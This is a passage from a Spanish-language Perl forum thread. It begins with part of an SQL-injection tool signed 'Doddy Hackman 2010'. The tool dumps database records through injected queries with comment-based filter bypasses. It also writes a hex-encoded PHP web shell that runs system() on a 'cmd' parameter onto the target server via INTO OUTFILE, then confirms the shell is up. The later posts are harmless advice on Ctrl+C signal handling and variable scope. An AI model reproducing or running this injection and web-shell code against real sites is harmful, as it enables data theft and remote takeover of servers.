$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n"; 
} else {
print "\n\n[+] Extracting Finish\n"; 
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}
 
 
sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {         
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma
 
($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d
 
64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}
 
sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}
 
sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}
 
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/**/"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}
 
sub ascii {
return join ',',unpack "U*",$_[0]; 
}
 
sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}
 
 
sub finish {
&copyright;
<STDIN>;
exit(1);
}
 
sub installer {
unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}
}
 
sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}
 
sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}
 
sub control { 
reload(); goto menua;
}
 
# The End ? 
 
Coloreado en 0.025 segundos,  usando GeSHi 1.0.8.4

El menú en el que quiero tener el filtro de control+C es menu_options(). Lo que quiero es que en cualquiera de las opciones de menu_options() retorne al menú sin problemas cuando se use control+C.

¿ Alguien puede ayudarme ?

Pero, con eso, se ejecutaría la función refrescar(), y volvería al lugar donde se estaba ejecutando (creo, no lo he probado).

Entonces, lo que se debería hacer (tampoco lo sé, no lo he probado), sería hacer un goto al lugar donde quieres que salte la ejecución.

Algo así (no probado):

$SIG{INT} = sub { reload(); goto MENU; }

y luego, enfrente de la línea donde quieres que salte, pones

MENU:

por **BigBear** » 2011-11-22 20:50 @909

Lo mismo, explorer: se pierde la variable $page que es lo importante al cargar el menú, no se me ocurre cómo hacerlo. Pensé en hacer archivo de texto con el último registro de página pero quedaría muy feo a mi simple criterio.

Actualicé el post teniendo en cuenta tu sugerencia en el código.

¿ Me podrías guiar sobre cómo hacerlo ?

por **explorer** » 2011-11-23 07:12 @341

Pero es que no puedes "saltar" dentro de una subrutina...

Si lo que quieres es que salte a la subrutina menu_options(), se debería poner así:

goto &menu_options;

pero entonces vemos que dentro de esa subrutina lees dos parámetros. En el caso del goto, no recibirías esos parámetros. Deberías tener en cuenta ese caso.

Y en cuanto a que se pierde el valor de $page, es porque es una variable local (está definida en la línea 176, y es local al contexto de la subrutina menu()). Si quieres mantenerla, debería ser una variable global.

Yo haría el programa sin tantas subrutinas, dejando el bucle principal dentro del programa principal. Así, en caso de pulsar Control-C, volvería la ejecución a un punto de ejecución normal, y no dentro de una subrutina. Y para mantener el estado general, usar variables globales.

por **BigBear** » 2011-11-23 09:18 @429

¿Me podrías dar un ejemplo de cómo declarar una variable global?

P.D.: tengo otra duda, porque cuando pongo lo siguiente delante del menú, en vez de usar menu: se tilda la aplicación y no avanza más. El código es el siguiente:

Sintáxis: [ Descargar ] [ Ocultar ]

Using perl Syntax Highlighting

$SIG{INT} = \&menu_options($_[0],$_[1]);
Coloreado en 0.001 segundos,  usando GeSHi 1.0.8.4

por **explorer** » 2011-11-23 11:19 @513

Te vale con poner

my $page;

al principio del programa, fuera de cualquier subrutina.

Más información en perldoc -f my .

por **explorer** » 2011-11-23 11:24 @517

Doddy escribiste:
Sintáxis: [ Descargar ] [ Ocultar ]
Sintáxis: [ Descargar ] [ Mostrar ]
Using perl Syntax Highlighting
$SIG{INT} = \&menu_options($_[0],$_[1]);

Coloreado en 0.001 segundos, usando GeSHi 1.0.8.4

Debería ser así (no probado):

Sintáxis: [ Descargar ] [ Ocultar ]

Using perl Syntax Highlighting

$SIG{INT} = sub { menu_options($_[0],$_[1]) };
Coloreado en 0.001 segundos,  usando GeSHi 1.0.8.4

pero dudo de que funcione.

por **BigBear** » 2011-11-23 11:34 @524

Bueno, con esa idea me veré forzado a usar un archivo de texto para el control. Espero que no quede tan feo.

por **explorer** » 2011-11-23 12:14 @552

¿Tampoco te ha servido la otra solución que te dí?

Es que es muy difícil ayudarte, si no te valen nuestras soluciones, y solo valen las tuyas :cry:

por **BigBear** » 2011-11-23 12:23 @557

Voy a reestructurar todo el código en un menú como me dijiste. Cuando lo termine lo publico, así me seguís ayudando.

Foro - Perl en Español

Ayuda con control+c

Ayuda con control+c

Publicidad

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

Re: Ayuda con control+c

¿Quién está conectado?